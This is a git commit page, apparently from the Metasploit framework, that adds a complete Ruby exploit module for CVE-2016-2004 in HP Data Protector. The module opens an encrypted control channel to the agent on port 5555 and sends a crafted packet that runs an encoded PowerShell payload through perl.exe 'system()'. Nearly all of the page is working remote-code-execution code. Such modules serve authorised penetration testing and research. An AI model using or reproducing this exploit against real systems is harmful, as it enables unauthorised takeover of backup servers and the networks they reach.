Exploit for HP Data Protector Encrypted Comms
Added exploit for HP Data Protector when using encrypted communications. This has been tested against v9.00 on Windows Server 2008 R2 but should also work against older versions of DP.bug/bundler_fix
parent
fb678564b1
commit
54c4771626
|
@ -0,0 +1,136 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: http://metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
require 'msf/core/exploit/powershell'
|
||||||
|
|
||||||
|
require 'openssl'
|
||||||
|
|
||||||
|
class MetasploitModule < Msf::Exploit::Remote
|
||||||
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
|
include Msf::Exploit::Remote::Tcp
|
||||||
|
include Msf::Exploit::Powershell
|
||||||
|
|
||||||
|
def initialize(info={})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => "HP Data Protector Encrypted Communication Remote Command Execution",
|
||||||
|
'Description' => %q{
|
||||||
|
This module exploits a well known remote code exection exploit after establishing encrypted control communications with a Data Protector agent. This allows exploitation of Data Protector agents that have been configured to only use encrypted control communications. This exploit works by executing the payload with Microsoft PowerShell so will only work against Windows Vista or newer. Tested against Data Protector 9.0 installed on Windows Server 2008 R2."
|
||||||
|
},
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Author' => [ 'Ian Lovering' ],
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
[ 'CVE', '2016-2004' ],
|
||||||
|
],
|
||||||
|
'Platform' => 'win',
|
||||||
|
'Targets' =>
|
||||||
|
[
|
||||||
|
[ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X86_64 ] } ]
|
||||||
|
],
|
||||||
|
'Payload' =>
|
||||||
|
{
|
||||||
|
'BadChars' => "\x00"
|
||||||
|
},
|
||||||
|
'DefaultOptions' =>
|
||||||
|
{
|
||||||
|
'WfsDelay' => 30,
|
||||||
|
'RPORT' => 5555
|
||||||
|
},
|
||||||
|
'Privileged' => false,
|
||||||
|
'DisclosureDate' => "Apr 18 2016",
|
||||||
|
'DefaultTarget' => 0))
|
||||||
|
end
|
||||||
|
|
||||||
|
def check
|
||||||
|
# For the check command
|
||||||
|
connect
|
||||||
|
sock.put(rand_text_alpha_upper(64))
|
||||||
|
response = sock.get_once(-1)
|
||||||
|
disconnect
|
||||||
|
|
||||||
|
if response.nil?
|
||||||
|
return Exploit::CheckCode::Safe
|
||||||
|
end
|
||||||
|
|
||||||
|
service_version = Rex::Text.to_ascii(response).chop.chomp
|
||||||
|
|
||||||
|
if service_version =~ /HP Data Protector/
|
||||||
|
print_status(service_version)
|
||||||
|
return Exploit::CheckCode::Detected
|
||||||
|
end
|
||||||
|
|
||||||
|
Exploit::CheckCode::Safe
|
||||||
|
|
||||||
|
end
|
||||||
|
|
||||||
|
def generate_dp_payload
|
||||||
|
|
||||||
|
command = cmd_psh_payload(
|
||||||
|
payload.encoded,
|
||||||
|
payload_instance.arch.first,
|
||||||
|
{ remove_comspec: true, encode_final_payload: true })
|
||||||
|
|
||||||
|
payload =
|
||||||
|
"\x32\x00\x01\x01\x01\x01\x01\x01" +
|
||||||
|
"\x00\x01\x00\x01\x00\x01\x00\x01" +
|
||||||
|
"\x01\x00\x20\x32\x38\x00\x5c\x70" +
|
||||||
|
"\x65\x72\x6c\x2e\x65\x78\x65\x00" +
|
||||||
|
"\x20\x2d\x65\x73\x79\x73\x74\x65" +
|
||||||
|
"\x6d('#{command}')\x00"
|
||||||
|
|
||||||
|
payload_length = [payload.length].pack('N')
|
||||||
|
|
||||||
|
return payload_length + payload
|
||||||
|
end
|
||||||
|
|
||||||
|
def exploit
|
||||||
|
# Main function
|
||||||
|
encryption_init_data =
|
||||||
|
"\x00\x00\x00\x48\xff\xfe\x32\x00\x36\x00\x37\x00\x00\x00\x20\x00" +
|
||||||
|
"\x31\x00\x30\x00\x00\x00\x20\x00\x31\x00\x30\x00\x30\x00\x00\x00" +
|
||||||
|
"\x20\x00\x39\x00\x30\x00\x30\x00\x00\x00\x20\x00\x38\x00\x38\x00" +
|
||||||
|
"\x00\x00\x20\x00\x6f\x00\x6d\x00\x6e\x00\x69\x00\x64\x00\x6c\x00" +
|
||||||
|
"\x63\x00\x00\x00\x20\x00\x34\x00\x00\x00\x00\x00"
|
||||||
|
|
||||||
|
print_status("Initiating connection")
|
||||||
|
|
||||||
|
# Open connection
|
||||||
|
connect
|
||||||
|
|
||||||
|
# Send init data
|
||||||
|
sock.put(encryption_init_data)
|
||||||
|
begin
|
||||||
|
buf = sock.get_once
|
||||||
|
rescue ::EOFError
|
||||||
|
end
|
||||||
|
|
||||||
|
print_status("Establishing encrypted channel")
|
||||||
|
|
||||||
|
# Create TLS / SSL context
|
||||||
|
sock.extend(Rex::Socket::SslTcp)
|
||||||
|
sock.sslctx = OpenSSL::SSL::SSLContext.new(:SSLv23)
|
||||||
|
sock.sslctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
|
||||||
|
|
||||||
|
sock.sslctx.options = OpenSSL::SSL::OP_ALL
|
||||||
|
|
||||||
|
# Enable TLS / SSL
|
||||||
|
sock.sslsock = OpenSSL::SSL::SSLSocket.new(sock, sock.sslctx)
|
||||||
|
sock.sslsock.connect
|
||||||
|
|
||||||
|
print_status("Sending payload")
|
||||||
|
|
||||||
|
# Send payload
|
||||||
|
sock.put(generate_dp_payload(), {timeout: 5})
|
||||||
|
|
||||||
|
# Close socket
|
||||||
|
disconnect
|
||||||
|
|
||||||
|
print_status("Waiting for payload execution (this can take up to 30 seconds or so)")
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
|
|
Loading…
Reference in New Issue